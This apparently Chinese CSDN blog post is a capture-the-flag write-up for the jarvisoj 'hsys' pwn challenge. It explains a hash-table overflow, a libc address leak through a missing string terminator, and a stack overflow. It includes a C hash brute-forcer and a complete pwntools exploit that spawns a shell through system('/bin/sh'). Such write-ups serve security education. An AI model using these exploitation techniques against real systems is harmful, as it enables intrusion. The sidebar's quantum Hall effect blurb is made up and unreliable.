jarvisoj_hsys(hash散列表)

最新推荐文章于 2024-07-25 17:11:44 发布
最新推荐文章于 2024-07-25 17:11:44 发布
阅读量567 收藏
点赞数
分类专栏: pwn 二进制漏洞 CTF 文章标签: 安全 PWN CTF 二进制漏洞 缓冲区溢出
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/seaaseesa/article/details/107576963
版权
pwn 同时被 3 个专栏收录
161 篇文章 24 订阅
订阅专栏
二进制漏洞
161 篇文章 9 订阅
订阅专栏
CTF
161 篇文章 9 订阅
订阅专栏

jarvisoj_hsys(hash散列表)

首先,检查一下程序的保护机制

然后,我们用IDA分析一下,在show功能里,如果cur_id为0,即admin账户,则v36为定值5,这样使得n变大,memcpy就有可能造成栈溢出,如果能让name长一些,那么info的内容就可以溢出更多一点。

为了寻找这样的name,首先要求hash(name) = 0,并且strlen(name)尽可能大,我们来看看hash计算的方法。

首先是利用一个hash函数生成一个hash初值,接着为了解决hash冲突,依次在ptr里寻找空闲的位置,但是没有检查hash表是否已经满了,因此如果这1338个空间都满了的话,id就直接等于hash(name)。

因此,将该hash函数提取出来,爆破一个字符串

#include <stdio.h>

#include <cstring>

#include <string>

#include <iostream>

using namespace std;

 

unsigned int hashid(string name) {

        unsigned int len = name.length();

        unsigned int j=0;

        int i;

        unsigned int k;

        for(i=0; i<len; i++) {

                 k = 0x401*(name[i]+j);

                 j = (k>>6)^k;

        }

        unsigned int ret;

        ret = (0x8001 * (((9*j)>>11)^9*j))%1337;

        return ret;

}

 

int main(void) {

        string a = "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa";

        string b;

        for(int i='a'; i<'z'; i++) {

                 for(char j='a'; j<'z'; j++) {

                         for(char m='a'; m<'z'; m++) {

                                  for(char n='a'; n<'z'; n++) {

                                          b=a;

                                          b+=i;

                                          b+=j;

                                          b+=m;

                                          b+=n;

                                          if(hashid(b) == 0) {

                                                   cout<<b<<endl;

                                                   return 0;

                                          }

                                  }

                         }

                 }

        }

        return 0;

}

再次注意到add_hacker函数,仅仅是在数组最后添加了一个\0,没有对字符串结尾添加\0,因此,可以用来泄露堆里面的main_arena指针,从而得到libc地址。

#coding:utf8
from pwn import *

#sh = process('./hsys',env={'LD_PRELOAD':'./libc-2.23_x86.so'})
sh = remote('node3.buuoj.cn',27475)
libc = ELF('./libc-2.23_x86.so')
malloc_hook_s = libc.symbols['__malloc_hook']

#context.log_level = 'debug'
#填满hash表,由于次数太多远程超时,我们一次性发送payload到远程缓冲区
payload = ''
for i in range(1337):
   payload += 'add ' + str(i) + '\n'
   #sh.sendlineafter('>>','add ' + str(i))
sh.sendlineafter('>>',payload)

sh.sendlineafter('>>','add haivk') #0
sh.sendlineafter('>>','add haivk2') #1
sh.sendlineafter('>>','add haivk') #取回0
sh.sendlineafter('>>','info ' + 'a'*0x80) #申请一个unsorted bin范围的chunk
sh.sendlineafter('>>','add haivk')
sh.sendlineafter('>>','info ' + 'a'*0x200) #将前一个unsorted bin释放

sh.sendlineafter('>>','add a')
sh.sendlineafter('>>','show')
sh.recvuntil('Name: ')
main_arena_88 = u32(sh.recv(4))
malloc_hook_addr = (main_arena_88 & 0xFFFFF000) + (malloc_hook_s & 0xFFF)
libc_base = malloc_hook_addr - malloc_hook_s
system_addr = libc_base + libc.sym['system']
binsh_addr = libc_base + libc.search('/bin/sh').next()
print 'libc_base=',hex(libc_base)
print 'system_addr=',hex(system_addr)
print 'binsh_addr=',hex(binsh_addr)

payload = 'a'*0x3A + p32(system_addr) + 'a'*0x4 + p32(binsh_addr)
sh.sendlineafter('>>','add aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaabx') #id=0
sh.sendlineafter('>>','info ' + payload)
sh.sendlineafter('>>','show') #栈溢出
sh.sendlineafter('>>','exit')


sh.interactive()

 

ha1vk
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
量子物理前沿之:量子霍尔效应与拓扑态
禅与计算机程序设计艺术
10-06 795
量子霍尔效应(quantum Hamiltionian effect)是指从一个宇宙系统中,通过测量其时间演化的过程,观察到超光速(甚至是无穷大的)光速时空中的弯曲现象。这是一种奇特而危险的现象,因为它可能导致宇宙物质与电磁波的相互作用破坏或失衡,影响整个宇宙的运行,也可能会引起社会、经济、文明等方面的深远影响。量子霍尔效应目前还没有完全解决,但在短期内应该可以避免发生大规模爆炸性事件。本文将对量子霍尔效应及其特性进行全面剖析,并结合一些具体的应用场景,探讨其出现的原因、机理和未来的发展方向。
sys/**.h sys文件夹里面的头文件
10-28
socket.h uio.h types.h cdefs.h fcntl.h file.h locking.h param.h .utime.h.. GNU 里面的C library,,对应的头文件
vk_code值-winuser.h
Scape1989的专栏
06-01 4342
//WinUser.h #ifndef NOVIRTUALKEYCODES #define VK_LBUTTON 0x01 #define VK_RBUTTON 0x02 #define VK_CANCEL 0x03 #define VK_MBUTTON 0x04 #if(_WIN32_WINNT >= 0x0500) #define VK_XBUTTON1 0x05
Linux_系统编程day01
scavenger1994的博客
03-10 179
将近日学习Linux基础编程,系统编程,网络编程的word笔记搬运过来,图片无法直接粘贴,就丢失掉了。日后工作学习中使用与扩充维护还是word笔记系统编程day01内容简介:程序和进程         磁盘中的二进制文件,运行的程序,cpu,虚拟地址空间,物理内存并行和并发         时间碎片和多核pcb进程控制块         文件描述符,进程id进程三态         就绪态,执行态...
利用MatConvNet进行孪生多分支网络设计
沈春旭的博客
08-01 3667
前面提及到了利用vl_nndist作为多分支网络的特征测度函数,将多个网络的局部输出融合到一起。参见博客:https://blog.csdn.net/shenziheng1/article/details/81263547。 很多文章中也提及到了,除了采用显式的距离测度函数,我们还可以使用全连接层进行设计,其中关键的一环就是如何将多个分支网络的输出拼接成一个输出。Matconvnet中已经开发了这...
hsys9_install_start_here.pdf
01-16
### Hyperion 9.3.1 安装指南知识点概览 #### 一、Hyperion 简介 - **产品概述**:Hyperion 是一款由 Oracle 公司开发的企业级绩效管理软件,用于帮助企业进行财务规划、预算编制、预测分析及报告等任务。...
房屋发布系统(Java)
09-10
房屋发布系统是一款基于Java语言开发的综合型软件,它的核心目标是为用户提供高效、便捷的房源信息发布和管理服务。在Java编程环境下,这样的系统通常采用MVC(Model-View-Controller)架构模式来设计,以确保代码的...
华为SG7000硬件介绍、典型配置
01-27
当多框级连时,存在主业务框和从业务框之分,通过HSYS板进行框间通信,形成更大的网络容量和更高的冗余备份能力。 HSYS板是系统的心脏,它负责框间通信、管理平面和控制平面的交互,确保整个系统的一致性和稳定性。...
华为S7000故障处理
01-27
极大话务量可能导致链路或特定板卡如SLPU(Signaling Link Processing Unit,信令链路处理单元)、SBPU(Signaling Board Processing Unit,信令板处理单元)、HSYS板的拥塞,而设备类紧急故障如机柜、机框和BAM的...
微软蓝屏事件引发对构建更加稳固和安全的网络环境的思考
lupai的博客
07-24 474
综上所述,构建更加稳固和安全的网络环境需要政府、企业和用户共同努力,从政策、技术、用户行为等多个方面入手,形成全方位、多层次的网络安全防护体系。构建更加稳固和安全的网络环境是一个系统工程,需要从多个方面入手,包括政策、技术、用户行为等多个层面。建立完善的应急响应机制,制定应急预案和演练计划,提高应对网络攻击和突发事件的能力。鼓励和支持网络安全技术的研发和创新,推动新技术在网络安全领域的应用和推广。加强对用户的网络安全教育,提高用户的网络安全意识和防范能力。
极速下载!青苹果系统Win7旗舰版:稳定安全!
lihuiyun184291的博客
07-25 395
今天系统之家小编给大家带来了青苹果系统Win7旗舰版镜像,该版本系统离线制作而成,安全无病毒,还升级了防火墙功能,大家安装后时刻都能放心操作。同时,它是在保持原有的功能并适度优化,保留下来的功能轻松满足大家的使用需求,系统稳定性也很高,运作顺畅不卡顿。
企业如何保证公司内网安全
shunyou0526的博客
07-25 309
部署防火墙和入侵检测系统:作为内网安全的第一道防线,防火墙和入侵检测系统能够有效阻止外部攻击和恶意软件的入侵。访问控制与身份验证:实施严格的访问控制策略,结合多因素认证(MFA),确保只有授权用户才能访问关键系统和数据。日志管理:建立全面的日志记录和审计机制,对所有数据访问、修改、删除等操作进行记录,以便于追踪和分析。电脑监控软件:使用电脑监控软件来监控员工的屏幕活动、上网行为等,防止内部威胁和不当使用公司资源。反病毒软件与反间谍软件:部署反病毒软件和反间谍软件等恶意软件防护工具,实时监测和清除恶意软件。
网络战时代的国家安全:策略、技术和国际合作
2301_79955948的博客
07-24 1127
网络战时代的国家安全涉及到策略、技术和国际合作等多个方面。
2024安全大模型技术与市场研究报告
cybtec的博客
07-25 425
2024安全大模型技术与市场研究报告
轨道式智能巡检机器人,助力综合管廊安全运维
配电房综合监控
07-25 818
管廊巡检往往处于昏暗、潮湿、幽闭且狭长的空间环境,巡检过程中容易遇到有毒有害气体、泄露的燃气和强电等危险,同时不可避免会对巡检人员的心理构成一定负面影响。)实时性:地下管廊短则几公里、长则数十公里,其内部空间结构复杂,具有设备多、定位难的特点。综合管廊内部环境复杂而恶劣,给水、排水、热力、燃气、电力、电信等管道排布其中,空间狭窄、昏暗、潮湿,甚至会出现有毒害气体泄漏的环境。)环境检测功能:基于各类环境传感器,对于廊体内温湿度、有害气体含量、空气含氧量、烟雾浓度、光照度、井盖等状态进行检测。
保障企业数据主权:安全可控的爬虫工具与管理平台
最新发布
zhou6343178的博客
07-25 672
在数据驱动的时代,企业对数据的需求日益增长,但如何在保障数据主权的前提下高效采集数据?本文深入探讨了选择安全可控爬虫工具与管理平台的重要性,分析了关键特性,并提出实用建议,助力企业维护数据安全,实现数据价值最大化。
HDShredder 7 企业版案例分享: 依照国际权威标准,安全清除企业数据
sanyuan7783的博客
07-24 1178
符合国际权威标准软件操作符合多种主流国际权威标准,包括 DoD 5200, BSI, VSITR, NCSC, NIST 及 GOST,支持擦除单个分区和区域,并可自由定制擦除模式。对于“Clear”清除级别,软件操作符合 ISO 27001, DIN 66399 以及 NIST SP 800-88R1要求。对于“Purge”级别,则使用 SecureErase 功能。安全擦除证书软件生成准确的安全清除证书,包括时间戳、序列号、以及清除过程的所有细节信息。远程擦除 - 使用 NetDisk 技术。
科普文:Linux系统安全加固指南
为无为,事无事,味无味。
07-25 856
本指南仅关注安全性和隐私性,而不关注性能,可用性或其他内容。列出的所有命令都将需要root特权。以“$”符号开头的单词表示一个变量,不同终端之间可能会有所不同。选择一个好的Linux发行版有很多因素。避免分发冻结程序包,因为它们在安全更新中通常很落后不使用与Systemd机制的发行版。Systemd包含许多不必要的攻击面;它尝试做的事情远远超出了必要,并且超出了初始化系统应做的事情。使用musl作为默认的C库。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值